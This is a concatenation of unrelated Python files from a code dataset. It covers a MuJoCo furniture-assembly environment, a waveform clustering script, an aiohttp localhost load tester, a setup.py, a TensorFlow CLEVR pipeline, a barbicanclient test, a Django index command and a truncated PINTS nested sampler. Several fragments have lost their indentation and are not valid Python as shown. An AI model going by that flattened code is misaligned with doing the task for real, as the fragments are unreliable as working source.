            id2_name = self.sim.model.body_id2name(id2)
            if id1_name == part1 and id2_name == part2:
                left = True
                break
        # The relative pose must be expressed in the frame of the constraint's
        # first body, hence the argument swap when part1 is not "left".
        rel_pose = self.relative_pose_from_names(part1, part2) if left else self.relative_pose_from_names(part2, part1)
        index = -1  # NOTE(review): unused leftover
        for i, (id1, id2) in enumerate(zip(self.sim.model.eq_obj1id, self.sim.model.eq_obj2id)):
            object_name1 = self._object_body_id2name[id1]
            object_name2 = self._object_body_id2name[id2]
            if (object_name1 == part1 and object_name2 == part2) or (object_name1 == part2 and object_name2 == part1):
                # Position (x, y, z)
                self.sim.model.eq_data[i][0] = rel_pose[0][0]
                self.sim.model.eq_data[i][1] = rel_pose[0][1]
                self.sim.model.eq_data[i][2] = rel_pose[0][2]
                # Quaternion stored as (w, x, y, z)
                self.sim.model.eq_data[i][3] = rel_pose[1][3]
                self.sim.model.eq_data[i][4] = rel_pose[1][0]
                self.sim.model.eq_data[i][5] = rel_pose[1][1]
                self.sim.model.eq_data[i][6] = rel_pose[1][2]
                break
def _connect_random(self, body1, body2, threshold):
# add collision check between parts
self._modify_eq_data(body1, body2)
old_qposes = {}
for name in self._object_names:
old_qposes[name] = self._get_qpos(name)
pos1 = old_qposes[body1][:3]
pos2 = old_qposes[body2][:3]
distance = np.linalg.norm(pos1-pos2)
if distance > threshold:
return False
# remove collision
group1 = self._find_group(body1)
group2 = self._find_group(body2)
for geom_id, body_id in enumerate(self.sim.model.geom_bodyid):
body_name = self.sim.model.body_names[body_id]
if body_name in self._object_names:
group = self._find_group(body_name)
if group in [group1, group2]:
if self.sim.model.geom_contype[geom_id] != 0:
self.sim.model.geom_contype[geom_id] = (1 << 30) - 1 - (1 << (group1 + 1))
self.sim.model.geom_conaffinity[geom_id] = (1 << (group1 + 1))
# move furniture to collision-safe position
if self._agent_type == 'Cursor':
self._stop_objects()
self.sim.forward()
self.sim.step()
min_pos1, max_pos1 = self._get_bounding_box(body1)
min_pos2, max_pos2 = self._get_bounding_box(body2)
min_pos = np.minimum(min_pos1, min_pos2)
if min_pos[2] < 0:
offset = [0, 0, -min_pos[2]]
self._move_rotate_object(body1, offset, [0, 0, 0])
self._move_rotate_object(body2, offset, [0, 0, 0])
# activate weld
if self._agent_type == 'Cursor':
self._stop_objects()
self.sim.forward()
self.sim.step()
self._activate_weld(body1, body2)
for name in self._object_names:
old_qposes[name] = self._set_qpos0(name, old_qposes[name])
self.sim.forward()
self.sim.step()
self._num_connected += 1
# release cursor
if self._agent_type == 'Cursor':
self._cursor_selected[1] = None
# set next subtask
self._get_next_subtask()
def _step_discrete(self, a):
"""
Takes a step for the cursor agent
"""
assert len(a) == 15
actions = [a[:7], a[7:]]
for cursor_i in range(2):
# move
move_offset = actions[cursor_i][0:3] * self._move_speed
# rotate
rotate_offset = actions[cursor_i][3:6] * self._rotate_speed
# select
select = actions[cursor_i][6] > 0
if not select:
self._cursor_selected[cursor_i] = None
success = self._move_cursor(cursor_i, move_offset)
if not success:
if self._debug:
print('could not move cursor')
continue
if self._cursor_selected[cursor_i] is not None:
success = self._move_rotate_object(
self._cursor_selected[cursor_i], move_offset, rotate_offset)
if not success:
if self._debug:
print('could not move cursor due to object out of boundary')
# reset cursor to original position
self._move_cursor(cursor_i, -move_offset)
continue
if select:
if self._cursor_selected[cursor_i] is None:
self._cursor_selected[cursor_i] = self._select_object(cursor_i)
connect = a[14]
if connect > 0 and self._cursor_selected[0] and self._cursor_selected[1]:
if self._debug:
print('random connect ({} and {})'.format(self._cursor_selected[0],
self._cursor_selected[1]))
self._connect_random(self._cursor_selected[0], self._cursor_selected[1], self.threshold)
elif self._connect_step > 0:
self._connect_step = 0
def _step_continuous(self, action):
"""
Step function for continuous control, like Sawyer, Baxter and Ur5
"""
agent_type = self._agent_type
if agent_type == "Ur5":
self._agent_type = 'Sawyer'
super()._step_continuous(action)
self._agent_type = agent_type
def _initialize_robot_pos(self):
agent_type = self._agent_type
if agent_type == "Ur5":
self._agent_type = 'Sawyer'
super()._initialize_robot_pos()
self._agent_type = agent_type
def _reset_internal(self):
"""
Resets simulation internal configurations.
"""
# instantiate simulation from MJCF model
self._load_model_robot()
self._load_model_arena()
self._load_model_object()
self._load_model()
# write xml for unity viewer
if self._unity:
self._unity.change_model(self.mujoco_model.get_xml(),
self._camera_id,
self._screen_width,
self._screen_height)
if self._debug:
print(self.mujoco_model.get_xml())
# construct mujoco model from xml
self.mjpy_model = self.mujoco_model.get_model(mode="mujoco_py")
self.sim = mujoco_py.MjSim(self.mjpy_model)
self.initialize_time()
self._is_render = self._visual_ob or self._render_mode != 'no'
if self._is_render:
self._destroy_viewer()
self._set_camera_position(self._camera_id, self._camera_pos)
self._set_camera_rotation(self._camera_id, self._camera_rot)
# additional housekeeping
self._sim_state_initial = self.sim.get_state()
self._get_reference()
self.cur_time = 0
# necessary to refresh MjData
self.sim.forward()
# setup mocap for ik control
if self._control_type == 'ik':
if self._agent_type == 'Sawyer':
import env.models
from env.controllers import SawyerIKController
self._controller = SawyerIKController(
bullet_data_path=os.path.join(env.models.assets_root, "bullet_data"),
robot_jpos_getter=self._robot_jpos_getter,
)
elif self._agent_type == 'Baxter':
import env.models
from env.controllers import BaxterIKController
self._controller = BaxterIKController(
bullet_data_path=os.path.join(env.models.assets_root, "bullet_data"),
robot_jpos_getter=self._robot_jpos_getter,
)
elif self._agent_type == 'Ur5':
import env.models
from env.controllers import Ur5IKController
self._controller = Ur5IKController(
bullet_data_path=os.path.join(env.models.assets_root, "bullet_data"),
robot_jpos_getter=self._robot_jpos_getter,
)
def _load_model_robot(self):
"""
Loads sawyer, baxter, or cursor
"""
if self._agent_type == 'Ur5':
from env.models.robots import Ur5
from env.models.grippers import gripper_factory
self.mujoco_robot = Ur5()
self.gripper = gripper_factory("TwoFingerGripper")
self.gripper.hide_visualization()
self.mujoco_robot.add_gripper("right_hand", self.gripper)
base_xpos = [0, 0.5, 0.1] if self._use_table_arena else [0, 0.45, -0.6]
self.mujoco_robot.set_base_xpos(base_xpos)
self.mujoco_robot.set_base_xquat([1, 0, 0, -1])
super()._load_model_robot()
    def pose_in_world_from_name(self, name):
        """
        A helper function that takes in a named data field and returns the pose
        of that object in the world frame.
        :param name: MuJoCo body name
        :return: 4x4 homogeneous transform of the body in world coordinates
        """
        pos_in_world = self.sim.data.get_body_xpos(name)
        rot_in_world = self.sim.data.get_body_xmat(name).reshape((3, 3))
        pose_in_world = T.make_pose(pos_in_world, rot_in_world)
        return pose_in_world
    def relative_pose_from_names(self, body1, body2):
        """Return the pose of ``body2`` expressed in ``body1``'s frame.

        :return: (position, quaternion) pair as produced by T.mat2pose
        """
        body1_pose_in_world = self.pose_in_world_from_name(body1)
        body2_pose_in_world = self.pose_in_world_from_name(body2)
        world_pose_in_body1 = T.pose_inv(body1_pose_in_world)
        body2_pose_in_body1 = T.pose_in_A_to_pose_in_B(body2_pose_in_world, world_pose_in_body1)
        return T.mat2pose(body2_pose_in_body1)
164812 | import numpy as np
import matplotlib
import pylab as pl
import pandas
from ae_measure2 import *
from feature_extraction import *
import glob
import os
import pandas as pd
from sklearn.decomposition import PCA
from sklearn.cluster import KMeans
from sklearn.metrics import davies_bouldin_score
from sklearn.preprocessing import StandardScaler
from sklearn.metrics import adjusted_rand_score as ari
from sklearn.cluster import SpectralClustering
if __name__ == "__main__":
'''
Set hyperparameters
'''
sig_len = 1024
k = 2 # NOTE: number of clusters
kmeans = KMeans(n_clusters=k, n_init=20000)
#kmeans = SpectralClustering(n_clusters=k, n_init=1000, eigen_solver='arpack'
# ,affinity="nearest_neighbors", n_neighbors=5)
reference_index = 1
test_index = 3
my_scaler = StandardScaler() # NOTE: normalize to unit variance
'''
Read-in and Setup
'''
mypath = 'C:/Research/Framework_Benchmarking/Data/PLB_data.json'
data = load_PLB(mypath)
waves = data['data']
targets = data['target']
angles = data['target_angle']
energy = data['energy']
reference_energies = energy[np.where(targets==reference_index)]
test_energies = energy[np.where(targets==test_index)]
energy_set = np.hstack((reference_energies, test_energies))
reference_waves = waves[np.where(targets==reference_index)]
test_waves = waves[np.where(targets==test_index)]
wave_set = np.vstack((reference_waves, test_waves))
reference_targets = targets[np.where(targets==reference_index)]
test_targets = targets[np.where(targets==test_index)]
target_set = np.hstack((reference_targets, test_targets))
'''
Cast experiment as vectors
'''
vect = []
for wave in wave_set:
feature_vector = extract_Sause_vect(waveform=wave)
vect.append(feature_vector) # set of all waveforms from channel as a vector
# NOTE: do rescaling
vect = my_scaler.fit_transform(vect)
'''
vect = np.array(vect)
x = vect.T[0]
y = vect.T[1]
pl.scatter(x,y,c=target_set)
pl.show()
'''
'''
Do k-means clustering and get labels
'''
print('Beginning clustering')
labels = kmeans.fit(vect).labels_
#print(kmeans.n_iter_)
print('ARI: ', ari(labels,target_set))
#df = pd.DataFrame({'Stress': stress, 'Ch_A': A_lads, 'Ch_B': B_lads, 'Ch_C': C_lads, 'Ch_D': D_lads})
#df.to_csv(r'Frequency_framework_labels.csv')
| StarcoderdataPython |
169727 | import asyncio
import aiohttp
import datetime
import argparse
import random
import uvloop
async def make_request(session, id, port):
    """Issue one GET to localhost:``port`` and report non-200 / error results.

    :param session: aiohttp.ClientSession shared across requests
    :param id: request identifier used in log output
    :param port: port to target on localhost
    """
    try:
        async with session.get('http://localhost:%s' % port) as resp:
            if resp.status != 200:
                print("Server error --%s-- returned for request %d" % (await resp.text(), id))
    except asyncio.CancelledError:
        # BUGFIX: never swallow cancellation — re-raise so gather() can
        # cancel this task (the original `except BaseException` also ate
        # KeyboardInterrupt/SystemExit).
        raise
    except Exception as e:
        print("Received error %s for message with id %d" % (e, id))
async def main(tasks, ports, pool_size=1000):
    """Fire ``tasks`` concurrent GET requests and return the elapsed time.

    :param tasks: number of requests to issue
    :param ports: comma-separated port list; each request picks one at random
    :param pool_size: connection-pool limit for the shared session
    :return: datetime.timedelta covering the gather() of all requests
    """
    #
    # Read ports - each request targets a port chosen at random from the list
    # (the original comment claimed round-robin, but random.choice is used)
    #
    ports = ports.split(",")
    #
    # Prepare list of coroutines in advance
    #
    conn = aiohttp.TCPConnector(limit=pool_size)
    async with aiohttp.ClientSession(connector=conn) as session:
        coros = [make_request(session, i, random.choice(ports)) for i in range(tasks)]
        started_at=datetime.datetime.now()
        print("Start time: ", "{:%H:%M:%S:%f}".format(started_at))
        await asyncio.gather(*coros)
        ended_at=datetime.datetime.now()
        print("End time: ", "{:%H:%M:%S:%f}".format(ended_at))
        duration = ended_at - started_at
        return duration
#
# Parse arguments
#
parser = argparse.ArgumentParser()
parser.add_argument("--tasks",
                    type=int,
                    default=1,
                    help="Number of tasks to spawn")
parser.add_argument("--pool_size",
                    type=int,
                    default=500,
                    help="Size of connection pool")
parser.add_argument("--ports",
                    type=str,
                    default="8888",
                    help="A comma-separated lists of ports to connect to")
args = parser.parse_args()

# Use uvloop's faster event loop, then run the benchmark.
uvloop.install()
duration = asyncio.run(main(args.tasks, args.ports, args.pool_size))

# Fractional seconds (duration.seconds alone would drop the microsecond part).
seconds = duration.seconds + (duration.microseconds / 1000000)
if seconds > 0:
    per_second = args.tasks / seconds
else:
    # Guard against a zero-length run to avoid division by zero.
    per_second = args.tasks
# BUG FIX: the original formatted the time as "%d.%d" % (seconds, microseconds),
# so e.g. 5 s + 50 us printed as "5.50 seconds".  Print the real value instead.
print("Completed %d requests in %.6f seconds (%d per second)"
      % (args.tasks, seconds, int(per_second)))
134756 | from setuptools import find_packages
from setuptools import setup
# Package metadata and dependency pins for the qontract-reconcile tool suite.
setup(
    name="qontract-reconcile",
    version="0.3.0",
    license="Apache License 2.0",
    author="<NAME>",
    author_email="<EMAIL>",
    python_requires=">=3.9",
    description="Collection of tools to reconcile services with their desired "
    "state as defined in the app-interface DB.",
    url='https://github.com/app-sre/qontract-reconcile',
    packages=find_packages(exclude=('tests',)),
    # Ship the Jinja2 templates alongside the reconcile package.
    package_data={'reconcile': ['templates/*.j2']},
    # Runtime dependencies; most are pinned to narrow ranges on purpose.
    install_requires=[
        "sretoolbox~=1.2",
        "Click>=7.0,<8.0",
        "graphqlclient>=0.2.4,<0.3.0",
        "toml>=0.10.0,<0.11.0",
        "jsonpath-rw>=1.4.0,<1.5.0",
        "PyGithub>=1.55,<1.56",
        "hvac>=0.7.0,<0.8.0",
        "ldap3>=2.9.1,<2.10.0",
        "anymarkup>=0.7.0,<0.8.0",
        "python-gitlab>=1.11.0,<1.12.0",
        "semver~=2.13",
        "python-terraform>=0.10.0,<0.11.0",
        "boto3>=1.17.49,<=1.18.0",
        "botocore>=1.20.49,<=1.21.0",
        "urllib3>=1.25.4,<1.26.0",
        "slack_sdk>=3.10,<4.0",
        "pypd>=1.1.0,<1.2.0",
        "Jinja2>=2.10.1,<2.11.0",
        "jira>=2.0.0,<2.1.0",
        "pyOpenSSL>=19.0.0,<20.0.0",
        "ruamel.yaml>=0.16.5,<0.17.0",
        "terrascript==0.9.0",
        "tabulate>=0.8.6,<0.9.0",
        "UnleashClient>=3.4.2,<3.5.0",
        "prometheus-client~=0.8",
        "sentry-sdk~=0.14",
        "jenkins-job-builder==2.10.1",
        "tzlocal==2.1",
        "parse==1.18.0",
        "sendgrid>=6.4.8,<6.5.0",
        "dnspython~=2.1",
        "requests==2.22.0",
        "kubernetes~=12.0",
        "openshift>=0.11.2",
        "websocket-client<0.55.0,>=0.35",
        "sshtunnel>=0.4.0",
        "croniter>=1.0.15,<1.1.0",
        "dyn~=1.8.1",
        "transity-statuspageio>=0.0.3,<0.1",
        "pydantic>=1.8.2,<1.9.0",
    ],
    test_suite="tests",
    classifiers=[
        'Development Status :: 2 - Pre-Alpha',
        'Programming Language :: Python',
        'Programming Language :: Python :: 3',
        'Programming Language :: Python :: 3.9',
    ],
    # Console entry points exposed by the installed package.
    entry_points={
        'console_scripts': [
            'qontract-reconcile = reconcile.cli:integration',
            'e2e-tests = e2e_tests.cli:test',
            'app-interface-reporter = tools.app_interface_reporter:main',
            'qontract-cli = tools.qontract_cli:root',
        ],
    },
)
| StarcoderdataPython |
1750754 | <reponame>jacenkow/inside<filename>inside/pipelines/clevr.py
# -*- coding: utf-8 -*-
#
# Copyright (C) 2020 <NAME>.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy of
# the License at http://www.apache.org/licenses/LICENSE-2.0.
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
"""Training and evaluation pipeline for the networks."""
import csv
import os
import tensorflow as tf
from tensorflow.keras.metrics import Mean
from inside import config
from inside.callbacks import setup_callbacks
from inside.constructor import setup_comet_ml, setup_model
from inside.loaders import CLEVR
from inside.metrics import DiceScore
def _write_results(logs):
    """Write final metric logs to ``results.csv`` in the experiment folder.

    Parameters
    ----------
    logs : dict
        Mapping of metric name to value; one CSV row per entry.
    """
    path = os.path.join(config.EXPERIMENT_FOLDER, "results.csv")
    # BUG FIX: the original opened the file without ever closing it; use a
    # context manager so the data is flushed and the handle released.
    with open(path, "w") as f:
        writer = csv.writer(f)
        for key, val in logs.items():
            writer.writerow([key, val])
class Pipeline:
    """Training/evaluation pipeline: builds the model, trains on CLEVR,
    logs metrics to Comet.ml, and writes final test results to CSV."""
    def __init__(self):
        # Model.
        self.model = setup_model()
        # Comet.ml experiment.
        self.comet_ml = setup_comet_ml()
        # Testing metrics.
        self.test_dice = DiceScore(name="testing_dice")
        self.test_loss = Mean(name="testing_loss")
        # Training metrics.
        self.training_dice = DiceScore(name="training_dice")
        self.training_loss = Mean(name="training_loss")
        # Callbacks: CSV logger, early stopping, model checkpoint, plotter.
        self.cl, self.es, self.mc, self.pp = setup_callbacks()
        # Each callback needs a reference to the model (and the plotter also
        # needs the Comet.ml experiment) to do its work.
        self.cl.model, self.es.model, self.mc.model = \
            self.model, self.model, self.model
        self.pp.model = self.model
        self.pp.comet_ml = self.comet_ml
    def fit(self):
        """Train the model, validating each epoch, then evaluate on the
        held-out test split and persist the final metrics."""
        # Toy dataset.
        loader = CLEVR()
        train_ds, valid_ds, test_ds = loader.load()
        with self.comet_ml.train():
            self.cl.on_train_begin()
            self.es.on_train_begin()
            self.mc.on_train_begin()
            self.pp.on_train_begin()
            for epoch in range(config.EXPERIMENT_EPOCHS):
                self.comet_ml.set_epoch(epoch)
                for images, labels in train_ds:
                    self.train_step(images, labels)
                for batch, (images, labels) in enumerate(valid_ds):
                    self.test_step(images, labels)
                    if not batch: # Log only first mini-batch from an epoch.
                        self.pp.on_epoch_end(epoch, images, labels)
                # Get results.
                logs = {
                    "dice": self.training_dice.result().numpy(),
                    "loss": self.training_loss.result().numpy(),
                    "validation_dice": self.test_dice.result().numpy(),
                    "validation_loss": self.test_loss.result().numpy(),
                }
                template = ("Epoch {}. Training Loss: {}. Training Dice: {}. "
                            "Validation Loss: {}. Validation Dice: {}.")
                print(template.format(epoch + 1,
                                      logs['loss'],
                                      logs['dice'],
                                      logs['validation_loss'],
                                      logs['validation_dice']))
                # Log metrics.
                self.comet_ml.log_metrics(logs, epoch=epoch)
                self.cl.on_epoch_end(epoch, logs)
                self.es.on_epoch_end(epoch, logs)
                self.mc.on_epoch_end(epoch, logs)
                # Reset the metrics for the next epoch.
                # (test_* metrics double as validation metrics during training.)
                self.training_dice.reset_states()
                self.training_loss.reset_states()
                self.test_dice.reset_states()
                self.test_loss.reset_states()
                # Early stopping criterion.
                if self.es.model.stop_training:
                    self.cl.on_train_end()
                    self.es.on_train_end()
                    self.mc.on_train_end()
                    break
        with self.comet_ml.test():
            for batch, (images, labels) in enumerate(test_ds):
                self.test_step(images, labels)
                if not batch:
                    self.pp.on_test_end(images, labels)
            # Get results.
            logs = {
                "dice": self.test_dice.result().numpy(),
                "loss": self.test_loss.result().numpy(),
            }
            print("Test Loss: {}. Test Dice: {}.".format(
                logs['loss'], logs['dice']))
            # Log metrics.
            self.comet_ml.log_metrics(logs)
            _write_results(logs)
    @tf.function
    def train_step(self, images, labels):
        """One optimisation step: forward pass, loss, gradients, update."""
        with tf.GradientTape() as tape:
            predictions = self.model.inference(images)
            loss = self.model.loss(labels, predictions)
        gradients = tape.gradient(loss, self.model.trainable_variables)
        self.model.optimiser.apply_gradients(
            zip(gradients, self.model.trainable_variables))
        # Accumulate running training metrics.
        self.training_loss(loss)
        self.training_dice(labels, predictions)
    @tf.function
    def test_step(self, images, labels):
        """One evaluation step: forward pass and metric accumulation only."""
        predictions = self.model.inference(images)
        t_loss = self.model.loss(labels, predictions)
        self.test_loss(t_loss)
        self.test_dice(labels, predictions)
| StarcoderdataPython |
1691327 | import testtools
from barbicanclient import base
class TestValidateRef(testtools.TestCase):
    """Unit tests for ``base.validate_ref``."""

    def test_valid_ref(self):
        """A URL whose final segment is a proper UUID validates."""
        href = 'http://localhost/ff2ca003-5ebb-4b61-8a17-3f9c54ef6356'
        self.assertTrue(base.validate_ref(href, 'Thing'))

    def test_invalid_uuid(self):
        """A URL whose final segment is not a UUID raises ValueError."""
        href = 'http://localhost/not_a_uuid'
        self.assertRaises(ValueError, base.validate_ref, href, 'Thing')
| StarcoderdataPython |
1786214 | from django.core.management.base import BaseCommand
from django.conf import settings
from webdnd.player.views.index import UserIndex
from optparse import make_option
class Command(BaseCommand):
    """Management command that (re)builds the application's search indices."""

    help = 'Creates with the search index'
    option_list = BaseCommand.option_list + (
        make_option('--flush',
            action='store_true',
            dest='flush',
            default=False,
            help='Remake the index from scratch'
        ),
        make_option('--index',
            action='append',
            # BUG FIX: with action='append', user-supplied values are appended
            # to the *default list*, so a default of ['all'] meant 'all' was
            # always present and explicit --index selections were ignored.
            # Start empty and treat "no selection" as "all" in handle().
            default=[],
            dest='indicies',
            help='Specify which index to refresh (default: all)'
        ),
    )

    # Registry of known indices: name -> index class and its storage directory.
    INDICIES = {
        'users': {'class': UserIndex, 'dir': settings.USER_INDEX_DIR},
    }

    def handle(self, *args, **options):
        """Rebuild every registered index, or only those named via --index."""
        self.flush = options['flush']
        selected = options['indicies']
        if not selected or 'all' in selected:
            for index in self.INDICIES.values():
                self.index(index)
        else:
            for name in selected:
                # Silently skip unknown index names, as before.
                if name in self.INDICIES:
                    self.index(self.INDICIES[name])

    def index(self, index):
        """Open (or create) the given index and (re)build its schema."""
        index = index['class'].get(index['dir'])
        index.create_schema(flush=self.flush)
| StarcoderdataPython |
1729595 | <gh_stars>0
#
# Nested ellipsoidal sampler implementation.
#
# This file is part of PINTS (https://github.com/pints-team/pints/) which is
# released under the BSD 3-clause license. See accompanying LICENSE.md for
# copyright notice and full license details.
#
#
from __future__ import absolute_import, division
from __future__ import print_function, unicode_literals
import pints
import numpy as np
class NestedEllipsoidSampler(pints.NestedSampler):
    r"""
    Creates a nested sampler that estimates the marginal likelihood
    and generates samples from the posterior.
    This is the form of nested sampler described in [1]_, where an ellipsoid is
    drawn around surviving particles (typically with an enlargement factor to
    avoid missing prior mass), and then random samples are drawn from within
    the bounds of the ellipsoid. By sampling in the space of surviving
    particles, the efficiency of this algorithm aims to improve upon simple
    rejection sampling. This algorithm has the following steps:
    Initialise::
        Z_0 = 0
        X_0 = 1
    Draw samples from prior::
        for i in 1:n_active_points:
            theta_i ~ p(theta), i.e. sample from the prior
            L_i = p(theta_i|X)
        endfor
        L_min = min(L)
        indexmin = min_index(L)
    Run rejection sampling for ``n_rejection_samples`` to generate
    an initial sample, along with updated values of ``L_min`` and
    ``indexmin``.
    Fit active points using a minimum volume bounding ellipse. In our approach,
    we do this with the following procedure (which we term
    ``minimum_volume_ellipsoid`` in what follows) that returns the positive
    definite matrix A with centre c that define the ellipsoid
    by :math:`(x - c)^t A (x - c) = 1`::
        cov = covariance(transpose(active_points))
        cov_inv = inv(cov)
        c = mean(points)
        for i in n_active_points:
            dist[i] = (points[i] - c) * cov_inv * (points[i] - c)
        endfor
        enlargement_factor = max(dist)
        A = (1.0 / enlargement_factor) * cov_inv
        return A, c
    From then on, in each iteration (t), the following occurs::
        if mod(t, ellipsoid_update_gap) == 0:
            A, c = minimum_volume_ellipsoid(active_points)
        else:
            if dynamic_enlargement_factor:
                enlargement_factor *= (
                    exp(-(t + 1) / n_active_points)**alpha
                )
            endif
        endif
        theta* = ellipsoid_sample(enlargement_factor, A, c)
        while p(theta*|X) < L_min:
            theta* = ellipsoid_sample(enlargement_factor, A, c)
        endwhile
        theta_indexmin = theta*
        L_indexmin = p(theta*|X)
    If the parameter ``dynamic_enlargement_factor`` is true, the enlargement
    factor is shrunk as the sampler runs, to avoid inefficiencies in later
    iterations. By default, the enlargement factor begins at 1.1.
    In ``ellipsoid_sample``, a point is drawn uniformly from within the minimum
    volume ellipsoid, whose volume is increased by a factor
    ``enlargement_factor``.
    At the end of iterations, there is a final ``Z`` increment::
        Z = Z + (1 / n_active_points) * (L_1 + L_2 + ..., + L_n_active_points)
    The posterior samples are generated as described in [2] on page 849 by
    weighting each dropped sample in proportion to the volume of the
    posterior region it was sampled from. That is, the probability
    for drawing a given sample j is given by::
        p_j = L_j * w_j / Z
    where j = 1, ..., n_iterations.
    Extends :class:`NestedSampler`.
    References
    ----------
    .. [1] "A nested sampling algorithm for cosmological model selection",
           <NAME>, <NAME>, <NAME>, 2008.
           arXiv: arXiv:astro-ph/0508461v2 11 Jan 2006
           https://doi.org/10.1086/501068
    """
    def __init__(self, log_prior):
        super(NestedEllipsoidSampler, self).__init__(log_prior)
        # Gaps between updating ellipsoid
        self.set_ellipsoid_update_gap()
        # Enlargement factor for ellipsoid
        self.set_enlargement_factor()
        # Base excess factor f0 used by the dynamic-enlargement schedule.
        # NOTE(review): _f0 is captured here once and is NOT refreshed by
        # set_enlargement_factor(); a later call to that setter leaves _f0
        # stale -- confirm whether this is intentional upstream.
        self._f0 = self._enlargement_factor - 1
        # Initial phase of rejection sampling
        # Number of nested rejection samples before starting ellipsoidal
        # sampling
        self.set_n_rejection_samples()
        self.set_initial_phase(True)
        self._needs_sensitivities = False
        # Dynamically vary the enlargement factor
        self._dynamic_enlargement_factor = False
        self._alpha = 0.2
        # Bounding-ellipsoid state: matrix A and centre, fitted lazily in ask().
        self._A = None
        self._centroid = None
    def set_dynamic_enlargement_factor(self, dynamic_enlargement_factor):
        """
        Sets dynamic enlargement factor
        """
        self._dynamic_enlargement_factor = bool(dynamic_enlargement_factor)
    def dynamic_enlargement_factor(self):
        """
        Returns dynamic enlargement factor.
        """
        return self._dynamic_enlargement_factor
    def set_alpha(self, alpha):
        """
        Sets alpha which controls rate of decline of enlargement factor
        with iteration (when `dynamic_enlargement_factor` is true).
        """
        if alpha < 0 or alpha > 1:
            raise ValueError('alpha must be between 0 and 1.')
        self._alpha = alpha
    def alpha(self):
        """
        Returns alpha which controls rate of decline of enlargement factor
        with iteration (when `dynamic_enlargement_factor` is true).
        """
        return self._alpha
    def set_initial_phase(self, in_initial_phase):
        """ See :meth:`pints.NestedSampler.set_initial_phase()`. """
        self._rejection_phase = bool(in_initial_phase)
    def needs_initial_phase(self):
        """ See :meth:`pints.NestedSampler.needs_initial_phase()`. """
        return True
    def in_initial_phase(self):
        """ See :meth:`pints.NestedSampler.in_initial_phase()`. """
        return self._rejection_phase
    def ellipsoid_update_gap(self):
        """
        Returns the ellipsoid update gap used in the algorithm (see
        :meth:`set_ellipsoid_update_gap()`).
        """
        return self._ellipsoid_update_gap
    def enlargement_factor(self):
        """
        Returns the enlargement factor used in the algorithm (see
        :meth:`set_enlargement_factor()`).
        """
        return self._enlargement_factor
    def n_rejection_samples(self):
        """
        Returns the number of rejection sample used in the algorithm (see
        :meth:`set_n_rejection_samples()`).
        """
        return self._n_rejection_samples
    def ask(self, n_points):
        """
        If in initial phase, then uses rejection sampling. Afterwards,
        points are drawn from within an ellipse (needs to be in uniform
        sampling regime).
        """
        i = self._accept_count
        # Switch from rejection to ellipsoidal sampling once enough samples
        # have been accepted, fitting the first bounding ellipsoid.
        if (i + 1) % self._n_rejection_samples == 0:
            self._rejection_phase = False
            # determine bounding ellipsoid
            self._A, self._centroid = self._minimum_volume_ellipsoid(
                self._m_active[:, :self._n_parameters]
            )
        if self._rejection_phase:
            if n_points > 1:
                self._proposed = self._log_prior.sample(n_points)
            else:
                self._proposed = self._log_prior.sample(n_points)[0]
        else:
            # update bounding ellipsoid if sufficient samples taken
            if ((i + 1 - self._n_rejection_samples)
                    % self._ellipsoid_update_gap == 0):
                self._A, self._centroid = self._minimum_volume_ellipsoid(
                    self._m_active[:, :self._n_parameters])
            # From Feroz-Hobson (2008) below eq. (14)
            if self._dynamic_enlargement_factor:
                f = (
                    self._f0 *
                    np.exp(-(i + 1) / self._n_active_points)**self._alpha
                )
                self._enlargement_factor = 1 + f
            # propose by sampling within ellipsoid
            self._proposed = self._ellipsoid_sample(
                self._enlargement_factor, self._A, self._centroid, n_points)
        return self._proposed
    def set_enlargement_factor(self, enlargement_factor=1.1):
        """
        Sets the factor (>1) by which to increase the minimal volume
        ellipsoidal in rejection sampling.
        A higher value means it is less likely that areas of high probability
        mass will be missed. A low value means that rejection sampling is more
        efficient.
        """
        if enlargement_factor <= 1:
            raise ValueError('Enlargement factor must exceed 1.')
        self._enlargement_factor = enlargement_factor
    def set_n_rejection_samples(self, rejection_samples=200):
        """
        Sets the number of rejection samples to take, which will be assigned
        weights and ultimately produce a set of posterior samples.
        """
        if rejection_samples < 0:
            raise ValueError('Must have non-negative rejection samples.')
        self._n_rejection_samples = rejection_samples
    def set_ellipsoid_update_gap(self, ellipsoid_update_gap=100):
        """
        Sets the frequency with which the minimum volume ellipsoid is
        re-estimated as part of the nested rejection sampling algorithm.
        A higher rate of this parameter means each sample will be more
        efficiently produced, yet the cost of re-computing the ellipsoid
        may mean it is better to update this not each iteration -- instead,
        with gaps of ``ellipsoid_update_gap`` between each update. By default,
        the ellipse is updated every 100 iterations.
        """
        ellipsoid_update_gap = int(ellipsoid_update_gap)
        if ellipsoid_update_gap <= 1:
            raise ValueError('Ellipsoid update gap must exceed 1.')
        self._ellipsoid_update_gap = ellipsoid_update_gap
    def _minimum_volume_ellipsoid(self, points, tol=0.0):
        """
        Finds an approximate minimum bounding ellipse in "center form":
        ``(x-c).T * A * (x-c) = 1``.
        """
        # Scale the inverse covariance so the most distant point (in
        # Mahalanobis distance) lies exactly on the ellipsoid boundary.
        cov = np.cov(np.transpose(points))
        cov_inv = np.linalg.inv(cov)
        c = np.mean(points, axis=0)
        dist = np.zeros(len(points))
        for i in range(len(points)):
            dist[i] = np.matmul(np.matmul(points[i] - c, cov_inv),
                                points[i] - c)
        enlargement_factor = np.max(dist)
        A = (1 - tol) * (1.0 / enlargement_factor) * cov_inv
        return A, c
    def _ellipsoid_sample(self, enlargement_factor, A, centroid, n_points):
        """
        Draws from the enlarged bounding ellipsoid.
        """
        if n_points > 1:
            return self._draw_from_ellipsoid(
                np.linalg.inv((1 / enlargement_factor) * A),
                centroid, n_points)
        else:
            return self._draw_from_ellipsoid(
                np.linalg.inv((1 / enlargement_factor) * A), centroid, 1)[0]
    def _draw_from_ellipsoid(self, covmat, cent, npts):
        """
        Draw ``npts`` random uniform points from within an ellipsoid with a
        covariance matrix covmat and a centroid cent, as per:
        http://www.astro.gla.ac.uk/~matthew/blog/?p=368
        """
        try:
            ndims = covmat.shape[0]
        except IndexError:  # pragma: no cover
            ndims = 1
        # calculate eigen_values (e) and eigen_vectors (v)
        eigen_values, eigen_vectors = np.linalg.eig(covmat)
        idx = (-eigen_values).argsort()[::-1][:ndims]
        e = eigen_values[idx]
        v = eigen_vectors[:, idx]
        e = np.diag(e)
        # generate radii of hyperspheres
        rs = np.random.uniform(0, 1, npts)
